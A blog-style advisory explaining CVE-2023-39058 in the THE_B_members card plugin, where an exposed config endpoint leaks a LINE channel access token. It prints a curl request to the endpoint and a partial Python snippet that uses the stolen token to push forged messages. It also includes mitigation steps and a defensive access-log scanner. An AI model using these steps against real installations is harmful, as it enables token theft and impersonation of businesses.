Recently, a vulnerability known as CVE-2023-39058 was discovered in THE_B_members card version 13.6.1. This issue allows attackers to extract the channel access token and send crafted messages by exploiting an exposed API endpoint. In this post, we’ll break down the vulnerability, show you how it works with a code snippet, and share resources for further reading.

What Is THE_B_members card?

THE_B_members card is a membership management and rewards plugin often used by businesses to handle loyalty cards and digital member services. It’s widely adopted in several regional markets due to its ease of use and integration with popular chat/messaging platforms.

What’s the CVE-2023-39058 Vulnerability?

The flaw appears in the way version 13.6.1 manages access credentials, particularly the *channel access token*—a sensitive string that should be kept private because it allows anyone to interact with the backend as if they were an admin or service account.

- Impact: Unauthorized retrieval of the channel access token
- Result: Attackers can send forged/crafted messages on behalf of the business through integrated platforms (like LINE or similar messaging APIs).

How the Leak Happens

In a misconfigured or default install (which is common), a particular endpoint serves configuration details without proper access controls. By simply sending a GET request to the right URL, an attacker can access sensitive information.

Vulnerable Endpoint Example

```
GET /plugins/THE_B_members/config
```

*(Replace with the correct path if your configuration differs.)*

The response contains details like:

```json
{
  "channel_id": "164xxx578",
  "channel_access_token": "4yA8ZxxxYO3waNXXXXVTkrB12JpUFv86vbe...",
  "provider": "theb_platform"
}
```

Fetching the endpoint with curl:

```bash
curl http://victim.com/plugins/THE_B_members/config
```

The leaked token is then presented as a bearer credential to the messaging platform's push API. The original post shows only the following fragment; the recipient and message body are not given, and the dictionary structure below is restored only to make the fragment syntactically valid:

```python
import requests

TOKEN = "<channel_access_token taken from the exposed config>"  # placeholder

headers = {
    "Authorization": f"Bearer {TOKEN}",
    "Content-Type": "application/json"
}
payload = {
    # recipient and message list were not shown in the original snippet
    "messages": [
        ...
    ]
}
resp = requests.post("https://api.line.me/v2/bot/message/push", headers=headers, json=payload)
```

Mitigation

- Upgrade to the latest patched version as soon as one is available.
- Block public access to any /config or related admin endpoints.
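Whether the endpoint is reachable is visible in the web server's access log, so a quick way to check for exposure (and to see who already fetched the config) is to scan the log for successful requests to that path. The script below is an added example, not code from the original post or from the THE_B_members card project; it assumes the server writes the standard combined log format and that the vulnerable path is exactly `/plugins/THE_B_members/config`, and the log lines it parses are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2023:21:20:01 +0000] "GET /plugins/THE_B_members/config HTTP/1.1" 200 312 "-" "curl/8.1.2"
198.51.100.20 - - [18/Sep/2023:21:20:05 +0000] "GET /plugins/THE_B_members/config HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.7 - - [18/Sep/2023:21:21:10 +0000] "GET /plugins/THE_B_members/card HTTP/1.1" 200 1544 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Sep/2023:21:22:00 +0000] "GET /plugins/THE_B_members/config HTTP/1.1" 403 128 "-" "curl/8.1.2"
"""

# Combined log format: ip ident user [timestamp] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Paths that must never be served to unauthenticated clients (assumed path from the post).
SENSITIVE_PATHS = ("/plugins/THE_B_members/config",)


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_config_exposure(log_text):
    """Return (hits, by_ip): requests to a sensitive path that the server actually served (2xx).

    A 403/404 for the same path means the block is working; only 2xx responses
    indicate the configuration (and the token inside it) was handed out.
    """
    hits = []
    by_ip = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if path in SENSITIVE_PATHS and 200 <= rec["status"] < 300:
            hits.append(rec)
            by_ip[rec["ip"]] += 1
    return hits, dict(by_ip)


if __name__ == "__main__":
    hits, by_ip = find_config_exposure(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} fetched {h['path']} ({h['ua']})")
    print("distinct clients that received the config:", len(by_ip))
```

Run it against the real log (`find_config_exposure(open("access.log").read())`) after applying the block: a non-empty result means the token should be treated as compromised and rotated, since every listed client received the full configuration response.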

References

- NVD Entry for CVE-2023-39058
- THE_B_members card official site *(Japanese)*
- About LINE channel access tokens

Summary

CVE-2023-39058 is a critical information leak in THE_B_members card plugin v13.6.1 that lets attackers easily steal your channel access token and impersonate your business in chat messages. Don’t wait—check your installation, block the vulnerable endpoint, and update your software immediately. If you’re unsure whether you’re exposed, follow the exploit steps above to see if you can retrieve your own token.

Timeline

Published on: 09/18/2023 21:15:55 UTC
Last modified on: 09/21/2023 19:33:37 UTC